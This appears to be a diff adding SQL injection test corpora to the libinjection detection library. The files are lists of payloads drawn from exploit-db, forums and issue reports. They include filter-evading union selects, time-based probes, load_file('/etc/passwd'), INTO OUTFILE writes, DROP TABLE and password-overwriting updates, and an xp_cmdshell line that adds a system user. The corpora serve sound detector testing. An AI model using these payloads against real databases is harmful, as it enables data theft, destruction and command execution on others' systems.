|
||||
9999'||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||'9999
|
||||
9999"||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||"9999
|
||||
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) as test
|
||||
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)
|
||||
9999'||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||'9999
|
||||
9999"||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||"9999
|
||||
(select 99999999 from pg_sleep(15)) as test
|
||||
(select 99999999 from pg_sleep(15))
|
||||
9999'||(select 99999999 from pg_sleep(15))||'9999
|
||||
9999"||(select 99999999 from pg_sleep(15))||"9999
|
15
libinjection/data/sqli-comparitiveprecomputation.txt
Normal file
15
libinjection/data/sqli-comparitiveprecomputation.txt
Normal file
|
@ -0,0 +1,15 @@
|
|||
# http://www.blackhatlibrary.net/Comparative_precomputation
|
||||
ascii(substring(version() from 1 for 1))
|
||||
length((select length(version())))
|
||||
ascii(substring(length(version()),1,1))
|
||||
(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=1)
|
||||
(select id from (select id,@v:=@v+1 as pos from articles y join (select @v:=0) k limit 255) x where pos=ascii(substring(version() from 1 for 1)))
|
||||
vulnerable_site' and 1=5 or title=() #'
|
||||
conv(hex(substr(version() FROM 1 FOR 2)),16,10)
|
||||
conv(hex(substr(version() FROM 1 FOR 2)),16,10) >> 0x6
|
||||
conv(hex(substr(version() FROM 2 FOR 2)),16,10) << 0x2 >> 0x6
|
||||
uncompress(compress(version()))
|
||||
LENGTH(compress(version()))
|
||||
LENGTH(version())
|
||||
LENGTH(load_file('/etc/passwd'))
|
||||
LENGTH(compress(load_file('/etc/passwd')))
|
40
libinjection/data/sqli-edb-17934.txt
Normal file
40
libinjection/data/sqli-edb-17934.txt
Normal file
|
@ -0,0 +1,40 @@
|
|||
# http://www.exploit-db.com/papers/17934/
|
||||
# A few typos corrected
|
||||
|
||||
1+or+1+%3D+1
|
||||
1+%7C%7C+1+%3D+1
|
||||
1+and+1+%3D+1
|
||||
1+%26%26+1+%3D+1
|
||||
1+%7C%7C+%28select+user+from+users+where+user_id+%3D+1%29+%3D+%27admin%27
|
||||
1+%7C%7C+%28select+user+from+users+where+user_id+%3D+1%29+%3D+%27admin%27
|
||||
1+%7C%7C+%28select+user+from+users+limit+1%29+%3D+%27admin%27
|
||||
1+%7C%7C+%28select+user+from+users+group+by+user_id+having+user_id+%3D+1%29+%3D+%27admin%27
|
||||
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users+%29+%3D+1
|
||||
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users%29+%3D+1
|
||||
1+%7C%7C+1+%3D+1+into+outfile+%27result.txt%27
|
||||
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+%27a%27
|
||||
1+%7C%7C+%28select+substr%28group_concat%28user_id%29%2C1%2C1%29+user+from+users%29+%3D+1
|
||||
1+%7C%7C+user_id+is+not+null
|
||||
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+0x61
|
||||
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+unhex%2861%29
|
||||
1+%7C%7C+substr%28user%2C1%2C1%29+%3D+lower%28conv%2811%2C10%2C36%29%29
|
||||
1+%7C%7C+lpad%28user%2C7%2C1%29
|
||||
1%0b||%0blpad(user,7,1)
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+%3D+%27users%27
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+%27a%27+and+%27z%27
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+char%2897%29+and+char%28122%29
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+between+0x61+and+0x7a
|
||||
1+union+select+1%2C+table_name+from+information_schema.tables+where+table_name+like+0x7573657273
|
||||
1+UnIoN/**/SeLecT/**/1,2,3--
|
||||
# double url-encoded
|
||||
## 21%252f%252a*/union%252f%252a*/select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
|
||||
21%2f%2a*/union%2f%2a*/select%2f%2a*/1,2,3%2f%2a*/from%2f%2a*/users--
|
||||
1+/**/union/**/select
|
||||
1+/%2A%2A/union/%2A%2A/select
|
||||
1+%2f**%2funion%2f**%2fselect
|
||||
0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
|
||||
0+div+1+union+select+1%2C2%2Ccurrent_user
|
||||
1+and+(select 1)=(select+0x414141414141441414141414114141414141414141414141414141414141414141.)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
|
||||
1/*!UnIoN*/SeLecT+1,2,3--
|
||||
=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables+*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
|
||||
1%27%3B+%2F%2A%26id%3D1%2A%2F+EXEC+%2F%2A%26id%3D1%2A%2F+master..xp_cmdshell+%2F%2A%26id%3D1%2A%2F+net+user+lucifer+UrWaFisShiT+%2F%2A%26id%3D1%2A%2F+--
|
14072
libinjection/data/sqli-forums.txt
Executable file
14072
libinjection/data/sqli-forums.txt
Executable file
File diff suppressed because it is too large
Load diff
131
libinjection/data/sqli-fullqueries.txt
Normal file
131
libinjection/data/sqli-fullqueries.txt
Normal file
|
@ -0,0 +1,131 @@
|
|||
#
|
||||
# Frequently not SQLi but
|
||||
#
|
||||
select 1 from foo where
|
||||
select @version from foo where
|
||||
select 'foo' from bar where
|
||||
# select 1,1,1,1,1,1,1
|
||||
# select @version,@version,@version
|
||||
# select 'foo','bar',1,2,3,4
|
||||
|
||||
select sin(1),2 from bar where
|
||||
select sin(id),2 from bar where
|
||||
select sin('1'),2 from bar where
|
||||
select sin(@version),2 from bar where
|
||||
select sin((1)),2 from bar where
|
||||
select sin((id)),2 from bar where
|
||||
select sin(('1')),2 from bar where
|
||||
select sin((@version)),2 from bar where
|
||||
select sin(((1)),2 from bar where
|
||||
select sin(((id)),2 from bar where
|
||||
select sin((('1')),2 from bar where
|
||||
select sin(((@version)),2 from bar where
|
||||
|
||||
select -sin(1),2 from bar where
|
||||
select -sin(id),2 from bar where
|
||||
select -sin('1'),2 from bar where
|
||||
select -sin(@version),2 from bar where
|
||||
select -sin((1)),2 from bar where
|
||||
select -sin((id)),2 from bar where
|
||||
select -sin(('1')),2 from bar where
|
||||
select -sin((@version)),2 from bar where
|
||||
select -sin(((1)),2 from bar where
|
||||
select -sin(((id)),2 from bar where
|
||||
select -sin((('1')),2 from bar where
|
||||
select -sin(((@version)),2 from bar where
|
||||
|
||||
select 1,sin(1),2 from bar where
|
||||
select 1,sin(id),2 from bar where
|
||||
select 1,sin('1'),2 from bar where
|
||||
select 1,sin(@version),2 from bar where
|
||||
select 1,sin((1)),2 from bar where
|
||||
select 1,sin((id)),2 from bar where
|
||||
select 1,sin(('1')),2 from bar where
|
||||
select 1,sin((@version)),2 from bar where
|
||||
select 1,sin(((1)),2 from bar where
|
||||
select 1,sin(((id)),2 from bar where
|
||||
select 1,sin((('1')),2 from bar where
|
||||
select 1,sin(((@version)),2 from bar where
|
||||
|
||||
select -1,sin(1),2 from bar where
|
||||
select -1,sin(id),2 from bar where
|
||||
select -1,sin('1'),2 from bar where
|
||||
select -1,sin(@version),2 from bar where
|
||||
select -1,sin((1)),2 from bar where
|
||||
select -1,sin((id)),2 from bar where
|
||||
select -1,sin(('1')),2 from bar where
|
||||
select -1,sin((@version)),2 from bar where
|
||||
select -1,sin(((1)),2 from bar where
|
||||
select -1,sin(((id)),2 from bar where
|
||||
select -1,sin((('1')),2 from bar where
|
||||
select -1,sin(((@version)),2 from bar where
|
||||
|
||||
select id,sin(1),2 from bar where
|
||||
select id,sin(id),2 from bar where
|
||||
select id,sin('1'),2 from bar where
|
||||
select id,sin(@version),2 from bar where
|
||||
select id,sin((1)),2 from bar where
|
||||
select id,sin((id)),2 from bar where
|
||||
select id,sin(('1')),2 from bar where
|
||||
select id,sin((@version)),2 from bar where
|
||||
select id,sin(((1)),2 from bar where
|
||||
select id,sin(((id)),2 from bar where
|
||||
select id,sin((('1')),2 from bar where
|
||||
select id,sin(((@version)),2 from bar where
|
||||
|
||||
select @version,sin(1),2 from bar where
|
||||
select @version,sin(id),2 from bar where
|
||||
select @version,sin('1'),2 from bar where
|
||||
select @version,sin(@version),2 from bar where
|
||||
select @version,sin((1)),2 from bar where
|
||||
select @version,sin((id)),2 from bar where
|
||||
select @version,sin(('1')),2 from bar where
|
||||
select @version,sin((@version)),2 from bar where
|
||||
select @version,sin(((1)),2 from bar where
|
||||
select @version,sin(((id)),2 from bar where
|
||||
select @version,sin((('1')),2 from bar where
|
||||
select @version,sin(((@version)),2 from bar where
|
||||
|
||||
select '1',sin(1),2 from bar where
|
||||
select '1',sin(id),2 from bar where
|
||||
select '1',sin('1'),2 from bar where
|
||||
select '1',sin(@version),2 from bar where
|
||||
select '1',sin((1)),2 from bar where
|
||||
select '1',sin((id)),2 from bar where
|
||||
select '1',sin(('1')),2 from bar where
|
||||
select '1',sin((@version)),2 from bar where
|
||||
select '1',sin(((1)),2 from bar where
|
||||
select '1',sin(((id)),2 from bar where
|
||||
select '1',sin((('1')),2 from bar where
|
||||
select '1',sin(((@version)),2 from bar where
|
||||
|
||||
select -'1',sin(1),2 from bar where
|
||||
select -'1',sin(id),2 from bar where
|
||||
select -'1',sin('1'),2 from bar where
|
||||
select -'1',sin(@version),2 from bar where
|
||||
select -'1',sin((1)),2 from bar where
|
||||
select -'1',sin((id)),2 from bar where
|
||||
select -'1',sin(('1')),2 from bar where
|
||||
select -'1',sin((@version)),2 from bar where
|
||||
select -'1',sin(((1)),2 from bar where
|
||||
select -'1',sin(((id)),2 from bar where
|
||||
select -'1',sin((('1')),2 from bar where
|
||||
select -'1',sin(((@version)),2 from bar where
|
||||
|
||||
select 1,(2),3 from bar where
|
||||
select (1),(2),3 from bar where
|
||||
select ((1)),(2),3 from bar where
|
||||
select (((1))),(2),3 from bar where
|
||||
select ('1'),(2),3 from bar where
|
||||
select (('1')),(2),3 from bar where
|
||||
select ((('1'))),(2),3 from bar where
|
||||
select (@version),(2),3 from bar where
|
||||
select ((@version)),(2),3 from bar where
|
||||
select (((@version))),(2),3 from bar where
|
||||
select (id),(2),3 from bar where
|
||||
select ((id)),(2),3 from bar where
|
||||
select (((id))),(2),3 from bar where
|
||||
|
||||
select (@version),(2),3 from bar where
|
||||
select (((((1,2,3,4)))) from bar
|
||||
|
315
libinjection/data/sqli-fuzz-ischi.txt
Normal file
315
libinjection/data/sqli-fuzz-ischi.txt
Normal file
|
@ -0,0 +1,315 @@
|
|||
#
|
||||
#
|
||||
#
|
||||
( 'a' ) --
|
||||
' - ( (SELECT BINARY ( 'b')) ) --
|
||||
' - ( ( BINARY COS ( 'b')) ) --
|
||||
' - ( BINARY BINARY ( 'b') ) --
|
||||
( 1 OR 1 ) --
|
||||
( 1 OR @a ) --
|
||||
( ( 1 ) ) --
|
||||
( 1 * @a ) --
|
||||
( (SELECT ( 1)) ) --
|
||||
( (SELECT ( @a)) ) --
|
||||
( BINARY ( 1) ) --
|
||||
( BINARY ( @a) ) --
|
||||
( @a OR 1 ) --
|
||||
( @a OR @a ) --
|
||||
( ( @a ) ) --
|
||||
( ( 1 OR 'b') ) --
|
||||
( ( 1 * 'b') ) --
|
||||
( (SELECT ( SELECT 'b')) ) --
|
||||
( ( SELECT ( 'b')) ) --
|
||||
( (SELECT 1 OR 'b') ) --
|
||||
( (SELECT 'a' OR 'b') ) --
|
||||
( (SELECT BINARY ( 'b')) ) --
|
||||
( (SELECT BINARY COS ( 'b')) ) --
|
||||
( (SELECT @a OR 'b') ) --
|
||||
( COS ( 1 OR 'b') ) --
|
||||
( COS ( 'a' OR 'b') ) --
|
||||
( COS ( BINARY ( 'b')) ) --
|
||||
( COS ( BINARY COS ( 'b')) ) --
|
||||
( COS ( @a OR 'b') ) --
|
||||
( 'a' OR 1 ) --
|
||||
( 'a' OR 'a' ) --
|
||||
( 'a' OR @a ) --
|
||||
( 'a' ) --
|
||||
( 'a' * 1 ) --
|
||||
( 'a' * 'a' ) --
|
||||
( 'a' * @a ) --
|
||||
( BINARY ( SELECT 'b') ) --
|
||||
( ( BINARY ( 'b')) ) --
|
||||
( BINARY BINARY ( 'b') ) --
|
||||
( BINARY BINARY COS ( 'b') ) --
|
||||
( ( @a OR 'b') ) --
|
||||
( ( @a * 'b') ) --
|
||||
( 1 in ( BINARY COS ( 'b')) ) --
|
||||
( (SELECT ( 1 OR 'b')) ) --
|
||||
( (SELECT ( SELECT 1)) ) --
|
||||
( (SELECT ( SELECT @a)) ) --
|
||||
( (SELECT ( 'a' OR 'b')) ) --
|
||||
( (SELECT ( BINARY ( 'b'))) ) --
|
||||
( (SELECT ( BINARY COS ( 'b'))) ) --
|
||||
( (SELECT ( @a OR 'b')) ) --
|
||||
( (SELECT 1 OR ( 'b')) ) --
|
||||
( (SELECT 1 OR 1) ) --
|
||||
( (SELECT 1 OR COS ( 'b')) ) --
|
||||
( (SELECT 1 OR @a) ) --
|
||||
( (SELECT 1 LIMIT 1) ) --
|
||||
( (SELECT COS ( 1 OR 'b')) ) --
|
||||
( (SELECT COS ( ( SELECT 'b'))) ) --
|
||||
( (SELECT COS ( 'a' OR 'b')) ) --
|
||||
( (SELECT COS ( BINARY ( 'b'))) ) --
|
||||
( (SELECT COS ( BINARY COS ( 'b'))) ) --
|
||||
( (SELECT COS ( @a OR 'b')) ) --
|
||||
( (SELECT 'a' OR ( 'b')) ) --
|
||||
( (SELECT 'a' OR 1) ) --
|
||||
( (SELECT 'a' OR COS ( 'b')) ) --
|
||||
( (SELECT 'a' OR @a) ) --
|
||||
( (SELECT 'a' LIMIT 1) ) --
|
||||
( (SELECT BINARY ( 1)) ) --
|
||||
( (SELECT BINARY ( SELECT 'b')) ) --
|
||||
( (SELECT BINARY ( COS ( 'b'))) ) --
|
||||
( (SELECT BINARY ( @a)) ) --
|
||||
( (SELECT BINARY COS ( 1)) ) --
|
||||
( (SELECT BINARY COS ( COS ( 'b'))) ) --
|
||||
( (SELECT BINARY COS ( @a)) ) --
|
||||
( (SELECT BINARY BINARY ( 'b')) ) --
|
||||
( (SELECT BINARY BINARY COS ( 'b')) ) --
|
||||
( (SELECT @a OR ( 'b')) ) --
|
||||
( (SELECT @a OR 1) ) --
|
||||
( (SELECT @a OR COS ( 'b')) ) --
|
||||
( (SELECT @a OR @a) ) --
|
||||
( (SELECT @a LIMIT 1) ) --
|
||||
( COS ( 1 OR ( 'b')) ) --
|
||||
( COS ( 1 OR 1) ) --
|
||||
( COS ( 1 OR COS ( 'b')) ) --
|
||||
( COS ( 1 OR @a) ) --
|
||||
( COS ( COS ( ( SELECT 'b'))) ) --
|
||||
( COS ( COS ( BINARY ( 'b'))) ) --
|
||||
( COS ( 'a' OR ( 'b')) ) --
|
||||
( COS ( 'a' OR 1) ) --
|
||||
( COS ( 'a' OR COS ( 'b')) ) --
|
||||
( COS ( 'a' OR @a) ) --
|
||||
( COS ( BINARY ( 1)) ) --
|
||||
( COS ( BINARY ( SELECT 'b')) ) --
|
||||
( COS ( BINARY ( COS ( 'b'))) ) --
|
||||
( COS ( BINARY ( @a)) ) --
|
||||
( COS ( BINARY BINARY ( 'b')) ) --
|
||||
( COS ( BINARY BINARY COS ( 'b')) ) --
|
||||
( COS ( @a OR ( 'b')) ) --
|
||||
( COS ( @a OR 1) ) --
|
||||
( COS ( @a OR COS ( 'b')) ) --
|
||||
( COS ( @a OR @a) ) --
|
||||
( BINARY ( 1 OR 'b') ) --
|
||||
( BINARY ( SELECT ( 'b')) ) --
|
||||
( BINARY ( SELECT 1) ) --
|
||||
( BINARY ( SELECT COS ( 'b')) ) --
|
||||
( BINARY ( SELECT @a) ) --
|
||||
( BINARY ( 'a' OR 'b') ) --
|
||||
( BINARY ( BINARY COS ( 'b')) ) --
|
||||
( BINARY ( @a OR 'b') ) --
|
||||
( BINARY COS ( 1 OR 'b') ) --
|
||||
( BINARY COS ( ( SELECT 'b')) ) --
|
||||
( BINARY COS ( 'a' OR 'b') ) --
|
||||
( BINARY COS ( BINARY ( 'b')) ) --
|
||||
( BINARY COS ( BINARY COS ( 'b')) ) --
|
||||
( BINARY COS ( @a OR 'b') ) --
|
||||
( BINARY BINARY ( 1) ) --
|
||||
( BINARY BINARY ( SELECT 'b') ) --
|
||||
( BINARY BINARY ( COS ( 'b')) ) --
|
||||
( BINARY BINARY ( @a) ) --
|
||||
( BINARY BINARY COS ( 1) ) --
|
||||
( BINARY BINARY COS ( COS ( 'b')) ) --
|
||||
( BINARY BINARY COS ( @a) ) --
|
||||
( BINARY BINARY BINARY ( 'b') ) --
|
||||
( BINARY BINARY BINARY COS ( 'b') ) --
|
||||
( @a in ( BINARY COS ( 'b')) ) --
|
||||
( 1 OR ( BINARY ( 'b')) ) --
|
||||
( 1 OR ( BINARY COS ( 'b')) ) --
|
||||
( 1 OR COS ( BINARY ( 'b')) ) --
|
||||
( 1 ) in ( BINARY ( 'b') ) --
|
||||
( 1 in ( BINARY BINARY ( 'b')) ) --
|
||||
( 1 * COS ( BINARY ( 'b')) ) --
|
||||
( (SELECT ( 1 OR ( 'b'))) ) --
|
||||
( (SELECT ( 1 OR 1)) ) --
|
||||
( (SELECT ( 1 OR COS ( 'b'))) ) --
|
||||
( (SELECT ( 1 OR @a)) ) --
|
||||
( (SELECT ( SELECT 1 OR 'b')) ) --
|
||||
( (SELECT ( SELECT 'a' OR 'b')) ) --
|
||||
( (SELECT ( SELECT BINARY ( 'b'))) ) --
|
||||
( (SELECT ( SELECT BINARY COS ( 'b'))) ) --
|
||||
( (SELECT ( SELECT @a OR 'b')) ) --
|
||||
( (SELECT ( COS ( ( SELECT 'b')))) ) --
|
||||
( (SELECT ( COS ( BINARY ( 'b')))) ) --
|
||||
( (SELECT ( 'a' OR ( 'b'))) ) --
|
||||
( (SELECT ( 'a' OR 1)) ) --
|
||||
( (SELECT ( 'a' OR COS ( 'b'))) ) --
|
||||
( (SELECT ( 'a' OR @a)) ) --
|
||||
( (SELECT ( BINARY ( 1))) ) --
|
||||
( (SELECT ( BINARY ( SELECT 'b'))) ) --
|
||||
( (SELECT ( BINARY ( COS ( 'b')))) ) --
|
||||
( (SELECT ( BINARY ( @a))) ) --
|
||||
( (SELECT ( BINARY BINARY ( 'b'))) ) --
|
||||
( (SELECT ( BINARY BINARY COS ( 'b'))) ) --
|
||||
( (SELECT ( @a OR ( 'b'))) ) --
|
||||
( (SELECT ( @a OR 1)) ) --
|
||||
( (SELECT ( @a OR COS ( 'b'))) ) --
|
||||
( (SELECT ( @a OR @a)) ) --
|
||||
( (SELECT 1 OR ( 1)) ) --
|
||||
( (SELECT 1 OR ( COS ( 'b'))) ) --
|
||||
( (SELECT 1 OR ( @a)) ) --
|
||||
( (SELECT 1 OR 1 * 'b') ) --
|
||||
( (SELECT 1 OR 'a' * 'b') ) --
|
||||
( (SELECT 1 OR @a * 'b') ) --
|
||||
( (SELECT 1 ) OR ( 'b') ) --
|
||||
( (SELECT 1 ) OR COS ( 'b') ) --
|
||||
( ( SELECT 1 ) OR 'b' ) --
|
||||
( (SELECT 1 UNION ( SELECT 'b')) ) --
|
||||
( (SELECT 1 in ( BINARY ( 'b'))) ) --
|
||||
( (SELECT COS ( ( SELECT ( 'b')))) ) --
|
||||
( (SELECT COS ( ( SELECT 1))) ) --
|
||||
( (SELECT COS ( ( SELECT COS ( 'b')))) ) --
|
||||
( (SELECT COS ( ( SELECT @a))) ) --
|
||||
( (SELECT COS ( BINARY BINARY ( 'b'))) ) --
|
||||
( (SELECT 'a' OR ( 1)) ) --
|
||||
( (SELECT 'a' OR ( COS ( 'b'))) ) --
|
||||
( (SELECT 'a' OR ( @a)) ) --
|
||||
( (SELECT 'a' OR 1 * 'b') ) --
|
||||
( (SELECT 'a' OR 'a' * 'b') ) --
|
||||
( (SELECT 'a' OR @a * 'b') ) --
|
||||
( (SELECT 'a' ) OR ( 'b') ) --
|
||||
( (SELECT 'a' ) OR COS ( 'b') ) --
|
||||
( ( SELECT 'a' ) OR 'b' ) --
|
||||
( (SELECT 'a' UNION ( SELECT 'b')) ) --
|
||||
( (SELECT 'a' in ( BINARY ( 'b'))) ) --
|
||||
( (SELECT BINARY ( 1 OR 'b')) ) --
|
||||
( (SELECT BINARY ( 1 * 'b')) ) --
|
||||
( (SELECT BINARY ( SELECT ( 'b'))) ) --
|
||||
( (SELECT BINARY ( SELECT 1)) ) --
|
||||
( (SELECT BINARY ( SELECT COS ( 'b'))) ) --
|
||||
( (SELECT BINARY ( SELECT @a)) ) --
|
||||
( (SELECT BINARY ( 'a' OR 'b')) ) --
|
||||
( (SELECT BINARY ( 'a' * 'b')) ) --
|
||||
( (SELECT BINARY ( BINARY ( 'b'))) ) --
|
||||
( (SELECT BINARY ( BINARY COS ( 'b'))) ) --
|
||||
( (SELECT BINARY ( @a OR 'b')) ) --
|
||||
( (SELECT BINARY ( @a * 'b')) ) --
|
||||
( (SELECT BINARY COS ( ( SELECT 'b'))) ) --
|
||||
( (SELECT BINARY COS ( BINARY ( 'b'))) ) --
|
||||
( (SELECT BINARY BINARY ( 1)) ) --
|
||||
( (SELECT BINARY BINARY ( SELECT 'b')) ) --
|
||||
( (SELECT BINARY BINARY ( COS ( 'b'))) ) --
|
||||
( (SELECT BINARY BINARY ( @a)) ) --
|
||||
( (SELECT BINARY BINARY BINARY ( 'b')) ) --
|
||||
( (SELECT BINARY BINARY BINARY COS ( 'b')) ) --
|
||||
( (SELECT @a OR ( 1)) ) --
|
||||
( (SELECT @a OR ( COS ( 'b'))) ) --
|
||||
( (SELECT @a OR ( @a)) ) --
|
||||
( (SELECT @a OR 1 * 'b') ) --
|
||||
( (SELECT @a OR 'a' * 'b') ) --
|
||||
( (SELECT @a OR @a * 'b') ) --
|
||||
( (SELECT @a ) OR ( 'b') ) --
|
||||
( (SELECT @a ) OR COS ( 'b') ) --
|
||||
( ( SELECT @a ) OR 'b' ) --
|
||||
( (SELECT @a UNION ( SELECT 'b')) ) --
|
||||
( (SELECT @a in ( BINARY ( 'b'))) ) --
|
||||
( COS ( ( SELECT ( SELECT 'b'))) ) --
|
||||
( COS ( ( SELECT 1 OR 'b')) ) --
|
||||
( COS ( ( SELECT 'a' OR 'b')) ) --
|
||||
( COS ( ( SELECT BINARY ( 'b'))) ) --
|
||||
( COS ( ( SELECT BINARY COS ( 'b'))) ) --
|
||||
( COS ( ( SELECT @a OR 'b')) ) --
|
||||
( COS ( BINARY ( BINARY ( 'b'))) ) --
|
||||
( COS ( BINARY BINARY BINARY ( 'b')) ) --
|
||||
( 'a' OR ( BINARY ( 'b')) ) --
|
||||
( 'a' OR ( BINARY COS ( 'b')) ) --
|
||||
( 'a' OR COS ( BINARY ( 'b')) ) --
|
||||
( 'a' ) in ( BINARY ( 'b') ) --
|
||||
( 'a' * COS ( BINARY ( 'b')) ) --
|
||||
( BINARY ( 1 OR ( 'b')) ) --
|
||||
( BINARY ( 1 OR 1) ) --
|
||||
( BINARY ( 1 OR COS ( 'b')) ) --
|
||||
( BINARY ( 1 OR @a) ) --
|
||||
( BINARY ( 1 ) OR 'b' ) --
|
||||
( BINARY ( SELECT ( 1)) ) --
|
||||
( BINARY ( SELECT ( SELECT 'b')) ) --
|
||||
( BINARY ( SELECT ( COS ( 'b'))) ) --
|
||||
( BINARY ( SELECT ( @a)) ) --
|
||||
( BINARY ( SELECT 1 OR 'b') ) --
|
||||
( BINARY ( SELECT 1 * 'b') ) --
|
||||
( BINARY ( SELECT 'a' OR 'b') ) --
|
||||
( BINARY ( SELECT 'a' * 'b') ) --
|
||||
( BINARY ( SELECT BINARY ( 'b')) ) --
|
||||
( BINARY ( SELECT BINARY COS ( 'b')) ) --
|
||||
( BINARY ( SELECT @a OR 'b') ) --
|
||||
( BINARY ( SELECT @a * 'b') ) --
|
||||
( BINARY ( COS ( ( SELECT 'b'))) ) --
|
||||
( BINARY ( COS ( BINARY ( 'b'))) ) --
|
||||
( BINARY ( 'a' OR ( 'b')) ) --
|
||||
( BINARY ( 'a' OR 1) ) --
|
||||
( BINARY ( 'a' OR COS ( 'b')) ) --
|
||||
( BINARY ( 'a' OR @a) ) --
|
||||
( BINARY ( 'a' ) OR 'b' ) --
|
||||
( BINARY ( BINARY ( SELECT 'b')) ) --
|
||||
( BINARY ( BINARY BINARY ( 'b')) ) --
|
||||
( BINARY ( BINARY BINARY COS ( 'b')) ) --
|
||||
( BINARY ( @a OR ( 'b')) ) --
|
||||
( BINARY ( @a OR 1) ) --
|
||||
( BINARY ( @a OR COS ( 'b')) ) --
|
||||
( BINARY ( @a OR @a) ) --
|
||||
( BINARY ( @a ) OR 'b' ) --
|
||||
( BINARY COS ( ( SELECT ( 'b'))) ) --
|
||||
( BINARY COS ( ( SELECT 1)) ) --
|
||||
( BINARY COS ( ( SELECT COS ( 'b'))) ) --
|
||||
( BINARY COS ( ( SELECT @a)) ) --
|
||||
( BINARY COS ( BINARY BINARY ( 'b')) ) --
|
||||
( BINARY BINARY ( 1 OR 'b') ) --
|
||||
( BINARY BINARY ( 1 * 'b') ) --
|
||||
( BINARY BINARY ( SELECT ( 'b')) ) --
|
||||
( BINARY BINARY ( SELECT 1) ) --
|
||||
( BINARY BINARY ( SELECT COS ( 'b')) ) --
|
||||
( BINARY BINARY ( SELECT @a) ) --
|
||||
( BINARY BINARY ( 'a' OR 'b') ) --
|
||||
( BINARY BINARY ( 'a' * 'b') ) --
|
||||
( BINARY BINARY ( BINARY ( 'b')) ) --
|
||||
( BINARY BINARY ( BINARY COS ( 'b')) ) --
|
||||
( BINARY BINARY ( @a OR 'b') ) --
|
||||
( BINARY BINARY ( @a * 'b') ) --
|
||||
( BINARY BINARY COS ( ( SELECT 'b')) ) --
|
||||
( BINARY BINARY COS ( BINARY ( 'b')) ) --
|
||||
( BINARY BINARY BINARY ( 1) ) --
|
||||
( BINARY BINARY BINARY ( SELECT 'b') ) --
|
||||
( BINARY BINARY BINARY ( COS ( 'b')) ) --
|
||||
( BINARY BINARY BINARY ( @a) ) --
|
||||
( BINARY BINARY BINARY BINARY ( 'b') ) --
|
||||
( BINARY BINARY BINARY BINARY COS ( 'b') ) --
|
||||
( @a OR ( BINARY ( 'b')) ) --
|
||||
( @a OR ( BINARY COS ( 'b')) ) --
|
||||
( @a OR COS ( BINARY ( 'b')) ) --
|
||||
( @a ) in ( BINARY ( 'b') ) --
|
||||
( @a in ( BINARY BINARY ( 'b')) ) --
|
||||
( @a * COS ( BINARY ( 'b')) ) --
|
||||
( 1 - (SELECT BINARY ( 1)) ) --
|
||||
( 1 - BINARY ( SELECT 1) ) --
|
||||
( 1 - BINARY COS ( ( 1)) ) --
|
||||
( 1 - BINARY BINARY ( 1) ) --
|
||||
( 1 - BINARY BINARY COS ( 1) ) --
|
||||
( 1 - BINARY BINARY BINARY ( 'b') ) --
|
||||
( 'a' or (SELECT BINARY ( 'b')) ) --
|
||||
( 'a' or BINARY ( SELECT 'b') ) --
|
||||
( 'a' or BINARY COS ( 1) ) --
|
||||
( 'a' or BINARY BINARY ( 'b') ) --
|
||||
( 'a' or BINARY BINARY COS ( 'b') ) --
|
||||
( 1 IN (1) or (SELECT BINARY ( 'b')) ) --
|
||||
( 1 IN (1) or BINARY ( SELECT 'b') ) --
|
||||
( 1 IN (1) or BINARY COS ( 1) ) --
|
||||
( 1 IN (1) or BINARY BINARY ( 'b') ) --
|
||||
( 1 IN (1) or BINARY BINARY COS ( 'b') ) --
|
||||
(select 1 from dual union select 1 limit 1) --
|
||||
(select 1); (select 1); update users set password = 99
|
||||
(select 1); select 1; update users set password = 99
|
||||
select 1; (select 1); update users set password = 99
|
||||
1; update users set password=1
|
||||
( (SELECT 'b') ) ; UPDATE user set password = 99;
|
||||
( (SELECT @a) ) ; UPDATE user set password = 99;
|
6
libinjection/data/sqli-github-110.txt
Normal file
6
libinjection/data/sqli-github-110.txt
Normal file
|
@ -0,0 +1,6 @@
|
|||
# https://github.com/client9/libinjection/issues/110
|
||||
# lots of great details in this ticket HT: @lifeforms
|
||||
|
||||
id having (1 or 1)
|
||||
id having (1 or true)
|
||||
id having (true or 1)
|
4
libinjection/data/sqli-github-114.txt
Normal file
4
libinjection/data/sqli-github-114.txt
Normal file
|
@ -0,0 +1,4 @@
|
|||
# https://github.com/client9/libinjection/issues/114
|
||||
# ht @sshayb
|
||||
|
||||
; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2
|
1
libinjection/data/sqli-github-123.txt
Normal file
1
libinjection/data/sqli-github-123.txt
Normal file
|
@ -0,0 +1 @@
|
|||
name=David' AND 2259=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(113)||CHR(122)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (2259=2259) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(112)||CHR(118)||CHR(113))) AND 'XrMo' LIKE 'XrMo
|
11
libinjection/data/sqli-github-125.txt
Normal file
11
libinjection/data/sqli-github-125.txt
Normal file
|
@ -0,0 +1,11 @@
|
|||
# https://github.com/client9/libinjection/issues/125 HT @d0znpp
|
||||
|
||||
"-sqlite_version() UNION SELECT password FROM users- --
|
||||
1337) INTO OUTFILE ‘xxx’--
|
||||
123);DROP TABLE users--
|
||||
) OR (SELECT password FROM users ...
|
||||
